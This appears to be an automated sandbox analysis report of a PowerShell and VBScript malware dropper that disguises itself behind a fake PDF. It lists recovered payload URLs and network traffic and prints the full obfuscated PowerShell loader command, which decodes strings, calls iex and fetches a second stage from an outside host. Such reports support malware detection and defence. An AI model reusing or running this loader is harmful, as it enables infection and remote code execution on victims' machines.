          Source: powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.
          Source: powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.i
          Source: powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.in
          Source: powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.inf
          Source: powershell.exe, 00000007.00000002.2653474547.000002251FCF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251EFAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251F2ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251FC05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251F1F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251FEF4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251F9B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info
          Source: powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/
          Source: powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/w
          Source: powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh
          Source: powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/
          Source: powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/S
          Source: powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Su0
          Source: powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Sub
          Source: powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subo
          Source: powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subor
          Source: powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subord
          Source: powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subordi
          Source: powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subordin
          Source: powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subordine
          Source: powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subordiner
          Source: powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subordinere
          Source: powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subordineren
          Source: powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subordinerend
          Source: powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subordinerende
          Source: powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subordinerendes
          Source: powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subordinerendes7
          Source: powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subordinerendes78
          Source: powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subordinerendes78.
          Source: powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subordinerendes78.s
          Source: powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subordinerendes78.sm
          Source: powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subordinerendes78.smi
          Source: powershell.exe, 00000007.00000002.2653474547.000002251EC5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.0000022520341000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subordinerendes78.smip
          Source: powershell.exe, 00000000.00000002.1669645213.0000022A14252000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1669645213.0000022A14706000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com
          Source: powershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/133-occhiali-protettivi
          Source: powershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1669645213.0000022A1472C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/144-filtri-per-maschere
          Source: powershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1669645213.0000022A1472C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/145-maschere-antigas
          Source: powershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/314-scarpe-antinfortunistiche-e-stivale-da-lavoro
          Source: powershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1669645213.0000022A1472C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/62-mascherine-protettive-ffp1-ffp2-ffp3
          Source: powershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/90-maschere-per-saldatura
          Source: powershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/cerca
          Source: powershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/contattaci
          Source: powershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/il-mio-account
          Source: powershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/img/logo.jpg
          Source: powershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/ordine
          Source: powershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/sitemap
          Source: powershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/themes/PRS070158/css/megnor/custom.css
          Source: powershell.exe, 00000000.00000002.1669645213.0000022A14252000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/wh/List
          Source: powershell.exe, 00000000.00000002.1669645213.0000022A14252000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/wh/List%20of%20required%20items%20and%20services.pdf
          Source: powershell.exe, 00000000.00000002.1669645213.0000022A14252000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/wh/List%20of%20rznvquirznvd%20itznvms%20and%20sznvrvicznvs.pdf
          Source: powershell.exe, 00000000.00000002.1669645213.0000022A14AA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.pineappletech.ae
          Source: powershell.exe, 00000000.00000002.1669645213.0000022A14AA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.pineappletech.ae/na/mg.vbs
          Source: powershell.exe, 00000000.00000002.1669645213.0000022A14AA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.pinznvapplznvtznvch.aznv/na/mg.vbs
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
          Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
          Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
          Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
          Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
          Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
          Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
          Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
          Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
          Source: unknownHTTPS traffic detected: 93.95.216.175:443 -> 192.168.2.9:49709 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 91.193.42.13:443 -> 192.168.2.9:49710 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 184.171.244.231:443 -> 192.168.2.9:49711 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 148.251.114.233:443 -> 192.168.2.9:49713 version: TLS 1.2

          System Summary

          barindex
          Windows Scripting host queries suspicious COM object (likely to drop second stage)
          Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
          Wscript starts Powershell (via cmd or directly)
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok Rekoe
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok RekoeJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 8173
          Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 8173Jump to behavior
          Source: classification engineClassification label: mal100.expl.evad.winPS1@11/13@4/4
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Desktop\List of Required items and services.pdfJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8016:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7380:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dqytk0t0.xf5.ps1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\ik473a.vbs'"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
          Source: cu.ps1ReversingLabs: Detection: 31%
          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cu.ps1"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\ik473a.vbs'"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\tq5.vbs"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok Rekoe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Succesfulde.blo && echo t"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\ik473a.vbs'"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\tq5.vbs" Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G 